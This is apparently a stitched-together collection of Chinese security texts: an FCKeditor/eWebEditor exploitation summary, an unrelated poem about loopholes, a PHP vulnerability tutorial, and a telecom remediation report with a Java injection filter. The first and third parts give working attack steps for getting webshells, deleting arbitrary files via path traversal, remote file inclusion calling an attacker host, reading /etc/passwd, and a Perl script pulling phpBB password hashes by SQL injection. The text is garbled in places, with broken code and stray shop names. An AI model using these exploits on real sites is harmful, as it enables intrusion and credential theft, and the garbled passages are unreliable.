第一篇:Fckeditor漏洞利用總結(jié)
Fckeditor漏洞利用總結(jié)
查看編輯器版本
FCKeditor/_whatsnew.html
—————————————————————————————————————————————————————————————
2.Version 2.2 版本
Apache+linux 環(huán)境下在上傳文件后面加個(gè).突破!測(cè)試通過。
—————————————————————————————————————————————————————————————
3.Version <=2.4.2 For php 在處理pHp 上傳的地方并未對(duì)Media 類型進(jìn)行上傳文件類型的控制,導(dǎo)致用戶上傳任意文件!將以下保存為html文件,修改action地址。
“%>利用上面說的遠(yuǎn)程上傳的方式!可以得到webshell!成功率取決于,虛擬主機(jī)的安全設(shè)置!
11、任意文件刪除漏洞!
此漏洞存在于ExampleNewsSystem目錄下的delete.asp文件中,這是ewebeditor的測(cè)試頁面,無須登陸可以直接進(jìn)入!看代碼
' 把帶”|“的字符串轉(zhuǎn)為數(shù)組
Dim aSavepathFileName
aSavepathFileName = Split(sSavepathFileName, ”|“)
' 刪除新聞相關(guān)的文件,從文件夾中
Dim i
For i = 0 To UBound(aSavepathFileName)
' 按路徑文件名刪除文件
Call DoDelFile(aSavepathFileName(i))
Next
而aSavepathFileName是前面從數(shù)據(jù)庫取出來的:
sSavepathFileName = oRs(”D_SavepathFileName“)
看看D_SavepathFileName是怎么添加到數(shù)據(jù)庫里的,在addsave.asp(modifysave.asp)里:sSavepathFileName = GetSafeStr(Request.Form(”d_savepathfilename“))
...oRs(”D_SavepathFileName“)= sSavepathFileName
居然過濾了,是GetSafeStr函數(shù),再看看這個(gè)函數(shù),在Startup.asp里:
Function GetSafeStr(str)
GetSafeStr = Replace(Replace(Replace(Trim(str), ”'“, ”“), Chr(34), ”“), ”;“, ”“)
End Function
既然路徑?jīng)]有過濾,那就可以直接定義了,構(gòu)造一個(gè)提交頁面,其中d_savepathfilename自己任意賦值(要?jiǎng)h除多個(gè)文件,用|隔開即可)。試試../../eWebEditor.asp,提交后刪除該新聞,于是主目錄下的eWebEditor.asp不見了!漏洞利用:
新聞列表%20|%20增加新聞
增加新聞
http://127.0.0.1/editor/Example/NewsSystem/addsave.asp”
method=“post” name=“myform”>
要?jiǎng)h的文件(相對(duì)路徑就可以了): | |
新聞標(biāo)題(隨便填): | |
標(biāo)題圖片: | 當(dāng)編輯區(qū)有插入圖片時(shí),將自動(dòng)填充此下拉框 |
新聞內(nèi)容(隨便填): |
刪除文件漏洞一般是配合其他漏洞使用的,比如目錄遍歷
然后得到返回的新聞ID再提交:http://004km.cn/editor/example/newssystem/delete.asp?id=[id]
有幾個(gè)版本的ewebeditor 上傳類型是在 security.asp 文件控制的!直接刪除該文件可以上傳任意webshell!
12、其他!
其他說點(diǎn)什么呢!以上的辦法都是本人經(jīng)驗(yàn)和網(wǎng)上搜集!暫時(shí)就想到這些了,以后想到了再補(bǔ)全!說說aspx php jsp版本的利用吧!
ASpX版:
受影響文件:eWebEditorNet/upload.aspx
利用方法:添好本地的cer的Shell文件。在瀏覽器地址欄輸入javascript:lbtnUpload.click();就能得到shell。嘿嘿....繞過了限制......成功的上傳了ASpX文件....文件默認(rèn)的上傳后保存的地址是eWebEditorNet/UploadFile/現(xiàn)在來看看是否上傳成功.....pHp版本:php版本和asp版本利用方式類似!不過php權(quán)限較高,不多廢話了!
jsp版本:網(wǎng)上有很多jsp的版本,根本沒有對(duì)上傳文件類型進(jìn)行檢測(cè)!需要注意的是jsp版本的沒有上傳按鈕!直接選擇文件,回車就可以提交了!
第三篇:漏洞現(xiàn)代詩歌
閃電把漆黑的天幕
撕開一條漏洞
瞬間照亮了前方的路
雷響了,雨來了
淹沒了蟬鳴,蛙聲
我仍然站在暴雨中
是期待還是等待
沒有什么目標(biāo)
只有讓閃電照耀
讓暴雨洗滌沾滿身驅(qū)的污垢
和疲憊不堪的肢體
我也記不清閃電劃過多少次
雷聲響過多少回
就好象數(shù)不清這生
有多少個(gè)漏洞
又失去多少個(gè)
可以擁有的機(jī)遇
上千個(gè)電話號(hào)碼
有幾個(gè)在你危難時(shí)
可以伸手相助
多少人鞍前馬后
有幾個(gè)能和你走到最后
春暖花開還訴說著情深似海
冬天一到便無影無蹤
也許上蒼給予這些眷顧
是你生命中注定的磨難
只能在這時(shí)才清醒
被雨澆透的輕松
總是在糾結(jié)過去了的往事
一個(gè)丟失
就成為一個(gè)漏洞
一個(gè)失敗
就鑄成終身憾事
用時(shí)間填補(bǔ)那些漏洞
用生命去等待
另一道閃電
照亮百孔千瘡的靈魂
這時(shí)才感到命運(yùn)中的頑強(qiáng)
是彌補(bǔ)這些漏洞的良藥
在暴風(fēng)雨中沖刷
在等待中找準(zhǔn)方向
迎接一個(gè)嶄新的未來
第四篇:PHP網(wǎng)站漏洞的相關(guān)總結(jié)
PHP網(wǎng)站漏洞的相關(guān)總結(jié)
NB聯(lián)盟-zwell 從現(xiàn)在的網(wǎng)絡(luò)安全來看,大家最關(guān)注和接觸最多的WEB頁面漏洞應(yīng)該是ASP了,在這方面,小竹是專家,我沒發(fā)言權(quán).然而在PHP方面來看,也同樣存在很嚴(yán)重的安全問題,但是這方面的文章卻不多.在這里,就跟大家來稍微的討論一下PHP頁面的相關(guān)漏洞吧.我對(duì)目前常見的PHP漏洞做了一下總結(jié),大致分為以下幾種:包含文件漏洞,腳本命令執(zhí)行漏洞,文件泄露漏洞,SQL注入漏洞等幾種.當(dāng)然,至于COOKIE欺騙等一部分通用的技術(shù)就不在這里討論了,這些資料網(wǎng)上也很多.那么,我們就一個(gè)一個(gè)來分析一下怎樣利用這些漏洞吧!首先,我們來討論包含文件漏洞.這個(gè)漏洞應(yīng)該說是PHP獨(dú)有的吧.這是由于不充分處理外部提供的惡意數(shù)據(jù),從而導(dǎo)致遠(yuǎn)程攻擊者可以利用這些漏洞以WEB進(jìn)程權(quán)限在系統(tǒng)上執(zhí)行任意命令.我們來看一個(gè)例子:假設(shè)在a.php中有這樣一句代碼: 在這段代碼中,$include一般是一個(gè)已經(jīng)設(shè)置好的路徑,但是我們可以通過自己構(gòu)造一個(gè)路徑來達(dá)到攻擊的目的.比方說我們提交:a.php?include=http://web/b.php,這個(gè)web是我們用做攻擊的空間,當(dāng)然,b.php也就是我們用來攻擊的代碼了.我們可以在b.php中寫入類似于:passthru(“/bin/ls /etc”);的代碼.這樣,就可以執(zhí)行一些有目的的攻擊了.(注:web服務(wù)器應(yīng)該不能執(zhí)行php代碼,不然就出問題了.相關(guān)詳情可以去看<<如何對(duì)PHP程序中的常見漏洞進(jìn)行攻擊>>).在這個(gè)漏洞方面,出狀況的很多,比方說:PayPal Store Front, HotNews,Mambo Open Source,PhpDig,YABB SE,phpBB,InvisionBoard,SOLMETRA SPAW Editor,Les Visiteurs,PhpGedView,X-Cart等等一些.接著,我們?cè)賮砜匆幌履_本命令執(zhí)行漏洞.這是由于對(duì)用戶提交的URI參數(shù)缺少充分過濾,提交包含惡意HTML代碼的數(shù)據(jù),可導(dǎo)致觸發(fā)跨站腳本攻擊,可能獲得目標(biāo)用戶的敏感信息。我們也舉個(gè)例子:在PHP Transparent的PHP PHP 4.3.1以下版本中的index.php頁面對(duì)PHPSESSID缺少充分的過濾,我們可以通過這樣的代碼來達(dá)到攻擊的目的: http://web/index.php?PHPSESSID=“>在script里面我們可以構(gòu)造函數(shù)來獲得用戶的一些敏感信息.在這個(gè)漏洞方面相對(duì)要少一點(diǎn),除了PHP Transparent之外還有:PHP-Nuke,phpBB,PHP Classifieds,PHPix,Ultimate PHP Board等等.再然后,我們就來看看文件泄露漏洞了.這種漏洞是由于對(duì)用戶提交參數(shù)缺少充分過濾,遠(yuǎn)程攻擊者可以利用它進(jìn)行目錄遍歷攻擊以及獲取一些敏感信息。我們拿最近發(fā)現(xiàn)的phpMyAdmin來做例子.在phpMyAdmin中,export.php頁面沒有對(duì)偉創(chuàng)電腦維修用戶提交的'what'參數(shù)進(jìn)行充分過濾,遠(yuǎn)程攻擊者提交包含多個(gè)'../'字符的數(shù)據(jù),便可繞過WEB ROOT限制,以WEB權(quán)限查看系統(tǒng)上的任意文件信息。比方說打入這樣一個(gè)地址:export.php?what=../../../../../../etc/passwd%00 就可以達(dá)到文件泄露的目的了.在這方面相對(duì)多一點(diǎn),有:myPHPNuke,McNews等等.最后,我們又要回到最興奮的地方了.想想我們平時(shí)在asp頁面中用SQL注入有多么爽,以前還要手動(dòng)注入,一直到小竹悟出”SQL注入密笈“(嘿嘿),然后再開做出NBSI以后,我們NB聯(lián)盟真是拉出一片天空.曾先后幫CSDN,大富翁論壇,中國(guó)頻道等大型網(wǎng)站找出漏洞.(這些廢話不多說了,有點(diǎn)跑題了...).還是言規(guī)正傳,其實(shí)在asp中SQL的注入和php中的SQL注入大致相同,只不過稍微注意一下用的幾個(gè)函數(shù)就好了.將asc改成ASCII,len改成LENGTH,其他函數(shù)基本不變了.其實(shí)大家看到PHP的SQL注入,是不是都會(huì)想到PHP-NUKE和PHPBB呢?不錯(cuò),俗話說樹大招分,像動(dòng)網(wǎng)這樣的論壇在asp界就該是漏洞這王了,這并不是說它的論壇安全太差,而是名氣太響,別人用的多了,研究的人也就多了,發(fā)現(xiàn)的安全漏洞也就越多了.PHPBB也是一樣的,現(xiàn)在很大一部分人用PHP做論壇的話,一般都是選擇了PHPBB.它的漏桂林偉創(chuàng)電腦洞也是一直在出,從最早phpBB.com phpBB 1.4.0版本被人發(fā)現(xiàn)漏洞,到現(xiàn)在最近的phpBB 2.0.6版本的groupcp.php,以及之前發(fā)現(xiàn)的search.php,profile.php,viewtopic.php等等加起來,大概也有十來個(gè)樣子吧.這也一直導(dǎo)致,一部分人在研究php漏洞的時(shí)候都會(huì)拿它做實(shí)驗(yàn)品,所謂百練成精嘛,相信以后的PHPBB會(huì)越來越好.好了,我們還是來分析一下漏洞產(chǎn)生的原因吧.拿viewtopic.php頁面來說,由于在調(diào)用viewtopic.php時(shí),直接從GET請(qǐng)求中獲得”topic_id“并傳遞給SQL查詢命令,而并沒有進(jìn)行一些過濾的處理,攻擊者可以提交特殊的SQL字符串用于獲得MD5密碼,獲得此密碼信息可以用于自動(dòng)登錄或者進(jìn)行暴力破解。(我想應(yīng)該不會(huì)有人想去暴力破解吧,除非有特別重要的原因).先看一下相關(guān)源代碼: # if(isset($HTTP_GET_VARS[POST_TOPIC_URL]))# { # $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);# } # else if(isset($HTTP_GET_VARS['topic']))# { # $topic_id = intval($HTTP_GET_VARS['topic']);# } 從上面我們可以看出,如果提交的view=newest并且sid設(shè)置了值的話,執(zhí)行的查詢代碼像下面的這個(gè)樣子(如果你還沒看過PHPBB源代碼的話,建議你看了再對(duì)著這里來看,受影響系統(tǒng)為:phpBB 2.0.5和phpBB 2.0.4).# $sql = ”SELECT p.post_id # FROM “.POSTS_TABLE.” p, “.SESSIONS_TABLE.” s, “.USERS_TABLE.” u # WHERE s.session_id = '$session_id' # AND u.user_id = s.session_user_id # AND p.topic_id = $topic_id # AND p.post_time >= u.user_lastvisit # ORDER BY p.post_time ASC # LIMIT 1“;Rick提供了下面的這斷測(cè)試代碼: use IO::Socket;$remote = shift || 'localhost';$view_topic = shift || '/phpBB2/viewtopic.php';$uid = shift || 2;$port = 80;$dbtype = 'mysql4';# mysql4 or pgsql print ”Trying to get password hash for uid $uid server $remote dbtype: $dbtypen“;$p = ”“;for($index=1;$index<=32;$index++){ $socket = IO::Socket::INET->new(PeerAddr => $remote, PeerPort => $port, Proto => ”tcp“, Type => SOCK_STREAM)or die ”Couldnt connect to $remote:$port : $@n“;$str = ”GET $view_topic“.”?sid=1&topic_id=-1“.random_encode(make_dbsql()).”&view=newest“.” HTTP/1.0nn“;print $socket $str;print $socket ”Cookie: phpBB2mysql_sid=1n“;# replace this for pgsql or remove it print $socket ”Host: $remotenn“;while($answer = <$socket>){ if($answer =~ /location:.*x23(d+)/)# Matches the location: viewtopic.php?p=
第五篇:javaWeb安全驗(yàn)證漏洞修復(fù)總結(jié)
EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收
漏洞修復(fù)總結(jié)
2011年5月
中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
目 錄 2 WEB安全介紹..........................................................................................................................1 SQL注入、盲注.......................................................................................................................1 2.1 SQL注入、盲注概述.................................................................................................................1 2.2 2.4 3 安全風(fēng)險(xiǎn)及原因...................................................................................................................2 應(yīng)用程序解決方案...............................................................................................................4 2.3 APPSCAN掃描建議......................................................................................................................2
會(huì)話標(biāo)識(shí)未更新.......................................................................................................................7 3.1 3.2 3.4 會(huì)話標(biāo)識(shí)未更新概述...........................................................................................................7 安全風(fēng)險(xiǎn)及原因分析...........................................................................................................8 應(yīng)用程序解決方案...............................................................................................................8 3.3 APPSCAN掃描建議......................................................................................................................8 已解密登錄請(qǐng)求.......................................................................................................................9 4.1 4.2 4.4 已解密登錄請(qǐng)求概述...........................................................................................................9 安全風(fēng)險(xiǎn)及原因分析...........................................................................................................9 應(yīng)用程序解決方案...............................................................................................................9 4.3 APPSCAN掃描建議......................................................................................................................9 跨站點(diǎn)請(qǐng)求偽造.....................................................................................................................11 5.1 5.2 5.4 跨站點(diǎn)請(qǐng)求偽造概述.........................................................................................................11 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................12 應(yīng)用程序解決方案.............................................................................................................13 5.3 APPSCAN掃描建議....................................................................................................................13 不充分賬戶封鎖.....................................................................................................................13 6.1 6.2 6.4 不充分賬戶封鎖概述.........................................................................................................13 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................13 應(yīng)用程序解決方案.............................................................................................................14 6.3 APPSCAN掃描建議....................................................................................................................14 啟用不安全HTTP方法...........................................................................................................14 7.1 7.2 7.4 啟用不安全HTTP方法概述...............................................................................................14 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................15 應(yīng)用程序解決方案.............................................................................................................15 7.3 APPSCAN掃描建議....................................................................................................................15 HTTP注釋敏感信息...............................................................................................................16 8.1 HTTP注釋敏感信息概述........................................................................................................16 8.2 8.4 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................16 應(yīng)用程序解決方案.............................................................................................................17 8.3 APPSCAN掃描建議....................................................................................................................16 發(fā)現(xiàn)電子郵件地址模式.........................................................................................................17
中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
9.1 9.2 9.4 10 發(fā)現(xiàn)電子郵件地址模式概述.............................................................................................17 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................17 應(yīng)用程序解決方案.............................................................................................................17 9.3 APPSCAN掃描建議....................................................................................................................17
通過框架釣魚.........................................................................................................................20
通過框架釣魚概述.............................................................................................................20 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................20 APPSCAN掃描建議...............................................................................................................21 應(yīng)用程序解決方案.............................................................................................................23 10.1 10.2 10.3 10.4 11 檢查到文件替代版本.............................................................................................................25
檢查到文件替代版本概述.................................................................................................25 安全風(fēng)險(xiǎn)及原因分析.........................................................................................................26 APPSCAN掃描建議...............................................................................................................26 應(yīng)用程序解決方案.............................................................................................................26 11.1 11.2 11.3 11.4
中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) Web安全介紹
目前很多業(yè)務(wù)都依賴于互聯(lián)網(wǎng),例如說網(wǎng)上銀行、網(wǎng)絡(luò)購物、網(wǎng)游等,很多惡意攻擊者出于不良的目的對(duì)Web 服務(wù)器進(jìn)行攻擊,想方設(shè)法通過各種手段獲取他人的個(gè)人賬戶信息謀取利益。正是因?yàn)檫@樣,Web業(yè)務(wù)平臺(tái)最容易遭受攻擊。同時(shí),對(duì)Web服務(wù)器的攻擊也可以說是形形色色、種類繁多,常見的有掛馬、SQL注入、緩沖區(qū)溢出、嗅探、利用IIS等針對(duì)Webserver漏洞進(jìn)行攻擊。
一方面,由于TCP/IP的設(shè)計(jì)是沒有考慮安全問題的,這使得在網(wǎng)絡(luò)上傳輸?shù)臄?shù)據(jù)是沒有任何安全防護(hù)的。攻擊者可以利用系統(tǒng)漏洞造成系統(tǒng)進(jìn)程緩沖區(qū)溢出,攻擊者可能獲得或者提升自己在有漏洞的系統(tǒng)上的用戶權(quán)限來運(yùn)行任意程序,甚至安裝和運(yùn)行惡意代碼,竊取機(jī)密數(shù)據(jù)。而應(yīng)用層面的軟件在開發(fā)過程中也沒有過多考慮到安全的問題,這使得程序本身存在很多漏洞,諸如緩沖區(qū)溢出、SQL注入等等流行的應(yīng)用層攻擊,這些均屬于在軟件研發(fā)過程中疏忽了對(duì)安全的考慮所致。
另一方面,用戶對(duì)某些隱秘的東西帶有強(qiáng)烈的好奇心,一些利用木馬或病毒程序進(jìn)行攻擊的攻擊者,往往就利用了用戶的這種好奇心理,將木馬或病毒程序捆綁在一些艷麗的圖片、音視頻及免費(fèi)軟件等文件中,然后把這些文件置于某些網(wǎng)站當(dāng)中,再引誘用戶去單擊或下載運(yùn)行?;蛘咄ㄟ^電子郵件附件和QQ、MSN等即時(shí)聊天軟件,將這些捆綁了木馬或病毒的文件發(fā)送給用戶,利用用戶的好奇心理引誘用戶打開或運(yùn)行這些文件、SQL注入、盲注 2.1 SQL注入、盲注概述
Web 應(yīng)用程序通常在后端使用數(shù)據(jù)庫,以與企業(yè)數(shù)據(jù)倉庫交互。查詢數(shù)據(jù)庫事實(shí)上的標(biāo)準(zhǔn)語言是 SQL(各大數(shù)據(jù)庫供應(yīng)商都有自己的不同版本)。Web 應(yīng)用程序通常會(huì)獲取用戶輸入(取自 HTTP 請(qǐng)求),將它并入 SQL 查詢中,然后發(fā)送到后端數(shù)據(jù)庫。接著應(yīng)用程序便處理查詢結(jié)果,有時(shí)會(huì)向用戶顯示結(jié)果。如果應(yīng)用程序?qū)τ脩簦ü粽撸┑妮斎胩幚聿粔蛐⌒模粽弑憧梢岳眠@種操作方式。在此情況下,攻擊者可以注入惡意的數(shù)據(jù),當(dāng)該數(shù)據(jù)并入 SQL 查詢中時(shí),就將查詢的原始語法更改得面目全非。例如,如果應(yīng)用程序使用用戶的輸入(如用戶名和密碼)來查詢用戶帳戶的數(shù)據(jù)庫表,以認(rèn)證用戶,而攻擊者能夠?qū)阂鈹?shù)據(jù)注入查詢的用戶名部分(和/或密碼部分),查詢便可能更改成 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
完全不同的數(shù)據(jù)復(fù)制查詢,可能是修改數(shù)據(jù)庫的查詢,或在數(shù)據(jù)庫服務(wù)器上運(yùn)行 Shell 命令的查詢。2.2 安全風(fēng)險(xiǎn)及原因
高風(fēng)險(xiǎn)漏洞,攻擊者可能會(huì)查看、修改或刪除數(shù)據(jù)庫條目和表
原因:未對(duì)用戶輸入正確執(zhí)行危險(xiǎn)字符清理
2.3 AppScan掃描建議
若干問題的補(bǔ)救方法在于對(duì)用戶輸入進(jìn)行清理。通過驗(yàn)證用戶輸入未包含危險(xiǎn)字符,便可能防止惡意的用戶導(dǎo)致應(yīng)用程序執(zhí)行計(jì)劃外的任務(wù),例如:?jiǎn)?dòng)任意 SQL 查詢、嵌入將在客戶端執(zhí)行的 Javascript 代碼、運(yùn)行各種操作系統(tǒng)命令,等等。建議過濾出所有以下字符: [1] |(豎線符號(hào))[2] &(& 符號(hào))[3];(分號(hào))
[4] $(美元符號(hào))[5] %(百分比符號(hào))[6] @(at 符號(hào))[7] '(單引號(hào))[8] “(引號(hào))
[9] '(反斜杠轉(zhuǎn)義單引號(hào))[10] ”(反斜杠轉(zhuǎn)義引號(hào))[11] <>(尖括號(hào))[12]()(括號(hào))[13] +(加號(hào))
[14] CR(回車符,ASCII 0x0d)[15] LF(換行,ASCII 0x0a)[16] ,(逗號(hào))[17](反斜杠)
以下部分描述各種問題、問題的修訂建議以及可能觸發(fā)這些問題的危險(xiǎn)字符: SQL 注入和 SQL 盲注:
A.確保用戶輸入的值和類型(如 Integer、Date 等)有效,且符合應(yīng)用程序預(yù)期。
B.利用存儲(chǔ)過程,將數(shù)據(jù)訪問抽象化,讓用戶不直接訪問表或視圖。當(dāng)使用存儲(chǔ)過程時(shí),請(qǐng)利用 ADO 命令對(duì)象來實(shí)施它們,以強(qiáng)化變量類型。C.清理輸入以排除上下文更改符號(hào),例如: [1] '(單引號(hào))[2] “(引號(hào))
[3] '(反斜線轉(zhuǎn)義單引號(hào))中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
[4] ”(反斜杠轉(zhuǎn)義引號(hào))[5])(結(jié)束括號(hào))[6];(分號(hào))跨站點(diǎn)腳本編制:
A.清理用戶輸入,并過濾出 JavaScript 代碼。我們建議您過濾下列字符: [1] <>(尖括號(hào))[2] “(引號(hào))[3] '(單引號(hào))[4] %(百分比符號(hào))[5];(分號(hào))[6]()(括號(hào))[7] &(& 符號(hào))[8] +(加號(hào))
B.如果要修訂 <%00script> 變體,請(qǐng)參閱 MS 文章 821349 C.對(duì)于 UTF-7 攻擊: [-] 可能的話,建議您施行特定字符集編碼(使用 'Content-Type' 頭或 標(biāo)記)。
HTTP 響應(yīng)分割:清理用戶輸入(至少是稍后嵌入在 HTTP 響應(yīng)中的輸入)。請(qǐng)確保輸入未包含惡意的字符,例如: [1] CR(回車符,ASCII 0x0d)[2] LF(換行,ASCII 0x0a)遠(yuǎn)程命令執(zhí)行:清理輸入以排除對(duì)執(zhí)行操作系統(tǒng)命令有意義的符號(hào),例如: [1] |(豎線符號(hào))[2] &(& 符號(hào))[3];(分號(hào))
執(zhí)行 shell 命令:
A.絕不將未檢查的用戶輸入傳遞給 eval()、open()、sysopen()、system()之類的 Perl 命令。
B.確保輸入未包含惡意的字符,例如: [1] $(美元符號(hào))[2] %(百分比符號(hào))[3] @(at 符號(hào))
XPath 注入:清理輸入以排除上下文更改符號(hào),例如: [1] '(單引號(hào))[2] ”(引號(hào))等 LDAP 注入:
A.使用正面驗(yàn)證。字母數(shù)字過濾(A..Z,a..z,0..9)適合大部分 LDAP 查詢。B.應(yīng)該過濾出或進(jìn)行轉(zhuǎn)義的特殊 LDAP 字符: [1] 在字符串開頭的空格或“#”字符 [2] 在字符串結(jié)尾的空格字符 [3] ,(逗號(hào))[4] +(加號(hào))[5] “(引號(hào))[6](反斜杠)[7] <>(尖括號(hào))中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
[8];(分號(hào))[9]()(括號(hào))MX 注入:
應(yīng)該過濾出特殊 MX 字符: [1] CR(回車符,ASCII 0x0d)
[2] LF(換行,ASCII 0x0a)記錄偽造: 應(yīng)該過濾出特殊記錄字符: [1] CR(回車符,ASCII 0x0d)[2] LF(換行,ASCII 0x0a)[3] BS(退格,ASCII 0x08)ORM 注入:
A.確保用戶輸入的值和類型(如 Integer、Date 等)有效,且符合應(yīng)用程序預(yù)期。
B.利用存儲(chǔ)過程,將數(shù)據(jù)訪問抽象化,讓用戶不直接訪問表或視圖。C.使用參數(shù)化查詢 API D.清理輸入以排除上下文更改符號(hào),例如:(*): [1] '(單引號(hào))[2] ”(引號(hào))
[3] '(反斜線轉(zhuǎn)義單引號(hào))[4] “(反斜杠轉(zhuǎn)義引號(hào))[5])(結(jié)束括號(hào))[6];(分號(hào))2.4 應(yīng)用程序解決方案
1、我們?yōu)榱苏{(diào)試方便,在頁面上會(huì)拋出數(shù)據(jù)庫異常信息,如果入侵工具獲取了這些信息,就可以獲取系統(tǒng)的一些配置信息,如web系統(tǒng)框架、采用的數(shù)據(jù)庫等,從而找出系統(tǒng)漏洞。所以不要在頁面上拋出異常的詳細(xì)信息,這些信息對(duì)客戶并沒有用,只是方便技術(shù)人員調(diào)試罷了,處理方法是在異常處理頁面把打印異常代碼刪除即可;
2、新建一個(gè)過濾器,通過過濾器過濾SQL注入特殊字符,配置成功后,重啟服務(wù),用Appsan工具掃描,漏洞得到解決,通過過濾器可以解決SQL注入、跨站點(diǎn)腳本編制及通過框架釣魚等問題,具體實(shí)現(xiàn)方式如下:
1、在web.xml文件中配置過濾器
2、過濾器過濾代碼
public class InjectFilter extends IsmpServletFilter {
private String failPage = ”/loginout.jsp“;//發(fā)生注入時(shí),跳轉(zhuǎn)頁面
public void doFilter(ServletRequest request,ServletResponse response,F(xiàn)ilterChain filterchain)throws IOException, ServletException { //判斷是否有注入攻擊字符
HttpServletRequest req =(HttpServletRequest)request;
String inj = injectInput(req);if(!inj.equals(”“)){ request.getRequestDispatcher(failPage).forward(request, return;response);} else { // 傳遞控制到下一個(gè)過濾器
filterchain.doFilter(request, response);} } /** * 判斷request中是否含有注入攻擊字符 * @param request * @return */ public String injectInput(ServletRequest request){
Enumeration e = request.getParameterNames();String attributeName;String attributeValues[];String inj = ”“;
while(e.hasMoreElements()){ attributeName =(String)e.nextElement();//不對(duì)密碼信息進(jìn)行過濾,一般密碼中可以包含特殊字符
if(attributeName.equals(”userPassword“)||attributeName.equals(”co
||attributeName.equals(“password”)||attributeName.equals(“PASSWOR continue;nfirmPassword”)||attributeName.equals(“PASSWORD”)D2“)||attributeName.equals(”valiPassword“)){ 5 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
}
attributeValues = request.getParameterValues(attributeName);
for(int i = 0;i < attributeValues.length;i++){
if(attributeValues[i]==null||attributeValues[i].equals(”“))
continue;
inj = injectChar(attributeValues[i]);
if(!inj.equals(”“)){
return inj;
}
} } return inj;} /** * 判斷字符串中是否含有注入攻擊字符 * @param str * @return */ public String injectChar(String str){
String inj_str = ”“)' * %”;String inj_stra[] = inj_str.split(“ ”);
for(int i = 0;i < inj_stra.length;i++){ if(str.indexOf(inj_stra[i])>=0){ return inj_stra[i];} } return “";}
}
中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié) 會(huì)話標(biāo)識(shí)未更新 3.1 會(huì)話標(biāo)識(shí)未更新概述
“會(huì)話固定”是一種攻擊技術(shù),會(huì)強(qiáng)制用戶的會(huì)話標(biāo)識(shí)變成顯式值。固定會(huì)話標(biāo)識(shí)值的技術(shù)有許多種,會(huì)隨著目標(biāo) Web 站點(diǎn)的功能而不同。從利用“跨站點(diǎn)腳本編制”到向 Web 站點(diǎn)密集發(fā)出先前生成的 HTTP 請(qǐng)求,都在這些技術(shù)范圍內(nèi)。用戶的會(huì)話標(biāo)識(shí)固定之后,攻擊者會(huì)等待用戶登錄,然后利用預(yù)定義的會(huì)話標(biāo)識(shí)值來假定用戶的聯(lián)機(jī)身份。
一般而言,對(duì)于標(biāo)識(shí)值的會(huì)話管理系統(tǒng)有兩種類型。第一種類型是“寬容”系統(tǒng),可讓 Web 瀏覽器指定任何標(biāo)識(shí)。第二種類型是“嚴(yán)格”系統(tǒng),只接受服務(wù)器端生成的值。當(dāng)使用寬容系統(tǒng)時(shí),不需要聯(lián)系 Web 站點(diǎn),便可以維護(hù)任何會(huì)話標(biāo)識(shí)。在嚴(yán)格系統(tǒng)中,攻擊者需要維護(hù)“陷阱會(huì)話”并且必須定期聯(lián)系 Web 站點(diǎn),才能防止閑置超時(shí)。對(duì)于會(huì)話固定,倘若沒有活動(dòng)保護(hù),使用會(huì)話來識(shí)別已認(rèn)證的用戶的任何 Web 站點(diǎn)都可能受到攻擊。使用會(huì)話標(biāo)識(shí)的 Web 站點(diǎn)通常都是基于 cookie 的站點(diǎn),但也會(huì)使用 URL 和隱藏的表單字段。不幸的是,基于 cookie 的會(huì)話最容易受到攻擊。目前已識(shí)別的大多數(shù)攻擊方法都是針對(duì) cookie 的固定。相對(duì)于在用戶登錄 Web 站點(diǎn)之后,再竊取用戶的會(huì)話標(biāo)識(shí),會(huì)話固定提供的機(jī)會(huì)多得多。
在用戶登錄之前,攻擊的活動(dòng)部分便已啟動(dòng)。
會(huì)話固定攻擊過程通常由三個(gè)步驟組成:
1)安裝會(huì)話
攻擊者針對(duì)目標(biāo) Web 站點(diǎn)設(shè)下“陷阱會(huì)話”,并獲取這個(gè)會(huì)話的標(biāo)識(shí),攻擊者也可以選擇攻擊中所用的任意會(huì)話標(biāo)識(shí)。在某些情況下,必須反復(fù)聯(lián)系 Web 站點(diǎn),才能維護(hù)確定好的陷阱會(huì)話值。
2)固定會(huì)話
攻擊者將陷阱會(huì)話值引進(jìn)用戶的瀏覽器中,固定用戶的會(huì)話標(biāo)識(shí)。
3)進(jìn)入會(huì)話
用戶登錄目標(biāo) Web 站點(diǎn)之后,當(dāng)使用固定會(huì)話標(biāo)識(shí)值時(shí),攻擊者便可加以接管?!?/p>
修改
對(duì)于這類問題解決方案為在用戶進(jìn)入登錄頁面時(shí)清空session讓cookie過期
request.getSession(true).invalidate();//清空session Cookie cookie = request.getCookies()[0];//獲取cookie cookie.setMaxAge(0);//讓cookie過期
另外一種方式利用JSP的一些特性,不讓登錄頁面產(chǎn)生Session <% page session=”false” %> 中國(guó)電信EMA服務(wù)管理平臺(tái)二期擴(kuò)容安全驗(yàn)收漏洞修復(fù)總結(jié)
3.2 安全風(fēng)險(xiǎn)及原因分析
高風(fēng)險(xiǎn)漏洞,可能會(huì)竊取或操縱客戶會(huì)話和 cookie,它們可能用于模仿合法用戶,從而使黑客能夠以該用戶身份查看或變更用戶記錄以及執(zhí)行事務(wù)
原因:Web 應(yīng)用程序編程或配置不安全
3.3 AppScan掃描建議
始終生成新的會(huì)話,供用戶成功認(rèn)證時(shí)登錄。防止用戶操縱會(huì)話標(biāo)識(shí)。
請(qǐng)勿接受用戶瀏覽器登錄時(shí)所提供的會(huì)話標(biāo)識(shí)
